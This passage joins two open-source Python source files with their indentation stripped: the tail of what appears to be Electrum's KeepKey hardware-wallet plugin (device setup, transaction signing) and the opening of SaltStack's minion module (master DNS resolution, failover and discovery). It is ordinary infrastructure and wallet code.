strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import os
import re
import sys
import copy
import time
import types
import signal
import random
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
# Since salt.log is imported below, salt.utils.network needs to be imported here as well
import salt.utils.network
if check_dns is True:
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found or not responsive. '
'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning(
'Master ip address changed from %s to %s',
opts['master_ip'], ret['master_ip']
)
if opts['source_interface_name']:
log.trace('Custom source interface required: %s', opts['source_interface_name'])
interfaces = salt.utils.network.interfaces()
log.trace('The following interfaces are available on this Minion:')
log.trace(interfaces)
if opts['source_interface_name'] in interfaces:
if interfaces[opts['source_interface_name']]['up']:
addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
interfaces[opts['source_interface_name']]['inet6']
ret['source_ip'] = addrs[0]['address']
log.debug('Using %s as source IP address', ret['source_ip'])
else:
log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
opts['source_interface_name'])
else:
log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
elif opts['source_address']:
ret['source_ip'] = salt.utils.network.dns_check(
opts['source_address'],
int(opts['source_ret_port']),
True,
opts['ipv6'])
log.debug('Using %s as source IP address', ret['source_ip'])
if opts['source_ret_port']:
ret['source_ret_port'] = int(opts['source_ret_port'])
log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
if opts['source_publish_port']:
ret['source_publish_port'] = int(opts['source_publish_port'])
log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
ret['master_uri'] = 'tcp://{ip}:{port}'.format(
ip=ret['master_ip'], port=opts['master_port'])
log.debug('Master URI: %s', ret['master_uri'])
return ret
def prep_ip_port(opts):
ret = {}
# Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
# a port specified. The is_ipv6 check returns False if brackets are used in the IP
# definition such as master: '[::1]:1234'.
if opts['master_uri_format'] == 'ip_only' or salt.utils.network.is_ipv6(opts['master']):
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(':', 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: [::1]:1234
# Strip off brackets for ipv6 support
ret['master'] = ip_port[0].strip('[]')
# Cast port back to an int! Otherwise a TypeError is thrown
# on some of the socket calls elsewhere in the minion and utils code.
ret['master_port'] = int(ip_port[1])
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
# if the arg is a dict with __kwarg__ == True, then its a kwarg
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632
if string_kwarg:
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.args.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
# Check for valid types
if not isinstance(opts['master'], (six.string_types, list)):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module %s', mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('%s returned from %s is not a string', opts['master'], mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: %s', mod_fun)
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters.
self._discover_masters()
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover or distributed is set, master has to be of type list
elif opts['master_type'] in ('failover', 'distributed'):
if isinstance(opts['master'], list):
log.info(
'Got list of available master addresses: %s',
opts['master']
)
if opts['master_type'] == 'distributed':
master_len = len(opts['master'])
if master_len > 1:
secondary_masters = opts['master'][1:]
master_idx = crc32(opts['id']) % master_len
try:
preferred_masters = opts['master']
preferred_masters[0] = opts['master'][master_idx]
preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
opts['master'] = preferred_masters
log.info('Distributed to the master at \'{0}\'.'.format(opts['master'][0]))
except (KeyError, AttributeError, TypeError):
log.warning('Failed to distribute to a specific master.')
else:
log.warning('master_type = distributed needs more than 1 master.')
if opts['master_shuffle']:
if opts['master_failback']:
secondary_masters = opts['master'][1:]
shuffle(secondary_masters)
opts['master'][1:] = secondary_masters
else:
shuffle(opts['master'])
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info(
'Moving possibly failed master %s to the end of '
'the list of masters', opts['master']
)
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns'] and opts['master_type'] == 'failover':
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
opts['local_masters'] = copy.copy(opts['master'])
if opts['random_master']:
shuffle(opts['local_masters'])
last_exc = None
opts['master_uri_list'] = list()
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
log.info(
'Master %s could not be reached, trying next '
'next master (if any)', opts['master']
)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
log.error(
'No master could be reached or all masters '
'denied the minion\'s connection attempt.'
)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not zmq:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
def _discover_masters(self):
'''
Discover master(s) and decide where to connect, if SSDP is around.
This modifies the configuration on the fly.
:return:
'''
if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
masters = {}
for att in range(self.opts['discovery'].get('attempts', 3)):
try:
att += 1
log.info('Attempting {0} time{1} to discover masters'.format(att, (att > 1 and 's' or '')))
masters.update(master_discovery_client.discover())
if not masters:
time.sleep(self.opts['discovery'].get('pause', 5))
else:
break
except Exception as err:
log.error('SSDP discovery failure: {0}'.format(err))
break
if masters:
policy = self.opts.get('discovery', {}).get('match', 'any')
if policy not in ['any', 'all']:
log.error('SSDP configuration matcher failure: unknown value "{0}". '
'Should be "any" or "all"'.format(policy))
else:
mapping = self.opts['discovery'].get('mapping', {})
for addr, mappings in masters.items():
for proto_data in mappings:
cnt = len([key for key, value in mapping.items()
if proto_data.get('mapping', {}).get(key) == value])
if policy == 'any' and bool(cnt) or cnt == len(mapping):
self.opts['master'] = proto_data['master']
return
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
# future lint: disable=str-format-in-logging
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: %s or '
'return_retry_timer_max: %s). Both must be positive '
'integers.',
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
# future lint: enable=str-format-in-logging
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
import salt.loader
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
install_zmq()
io_loop = ZMQDefaultLoop.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import salt.utils.yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['saltenv'] is not None:
penv = self.opts['saltenv']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.files.fopen(ptop, 'wb') as fp_:
salt.utils.yaml.safe_dump(cache_top, fp_)
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
